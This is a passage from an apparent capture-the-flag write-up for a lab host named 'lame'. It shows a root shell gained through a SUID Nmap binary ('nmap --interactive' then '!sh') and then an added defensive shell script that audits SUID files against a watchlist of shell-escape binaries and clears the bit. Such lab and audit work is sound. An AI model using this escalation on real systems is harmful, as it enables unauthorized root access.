Nmap
Nmap is configured as a SUID binary on the target system.
According to GTFOBins, Nmap can be abused for privilege escalation if it has the SUID bit set.
I will get straight to it:
daemon@lame:/var$ nmap --interactive
starting nmap v. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
sh-3.2# whoami
root
sh-3.2# hostname
lame
sh-3.2# ifconfig
eth0 link encap:Ethernet HWaddr 00:50:56:b9:b0:52
inet addr:10.10.10.3 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: dead:beef::250:56ff:feb9:b052/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:b052/64 Scope:Link
up broadcast running multicast mtu:1500 Metric:1
rx packets:364197 errors:0 dropped:0 overruns:0 frame:0
tx packets:7011 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
rx bytes:33735035 (32.1 MB) TX bytes:966387 (943.7 KB)
interrupt:19 Base address:0x2024
lo link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
up loopback running mtu:16436 Metric:1
rx packets:1565 errors:0 dropped:0 overruns:0 frame:0
tx packets:1565 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
rx bytes:756377 (738.6 KB) TX bytes:756377 (738.6 KB)
System Level Compromise
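
From the defender's side, the finding above is a SUID binary that offers a shell escape. The following audit is an added example, not part of the original write-up: it lists SUID files whose names are on a watchlist and clears the bit. The function names, the AUDIT_ROOT variable and the short watchlist are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: find SUID files that are known to offer a shell escape.
# WATCHLIST is a short constructed sample; nmap is the binary from this write-up.
# Extend it from the GTFOBins SUID category for real use.
WATCHLIST="nmap find vim bash less"

# audit_suid DIR: print "<mode> uid=<owner> <path>" for every regular file under
# DIR that has the setuid bit set and whose basename is on the watchlist.
audit_suid() {
    root=$1
    # -xdev keeps find on one filesystem; -perm -4000 matches the setuid bit.
    find "$root" -xdev -type f -perm -4000 2>/dev/null |
    while IFS= read -r path; do
        name=$(basename "$path")
        for w in $WATCHLIST; do
            if [ "$name" = "$w" ]; then
                # Numeric owner: uid=0 means a shell escape runs as root.
                info=$(ls -ln "$path" | awk '{print $1 " uid=" $3}')
                printf '%s %s\n' "$info" "$path"
            fi
        done
    done
}

# remediate FILE: remove the setuid bit so the binary runs as the calling user.
remediate() {
    chmod u-s "$1"
}

# Optional stand-alone run: AUDIT_ROOT=/usr sh this_script.sh
if [ -n "${AUDIT_ROOT:-}" ]; then
    audit_suid "$AUDIT_ROOT"
fi
```

Any hit with uid=0 is the condition shown in the session above; Nmap does not need the SUID bit for unprivileged scan types, so removing it is the usual fix.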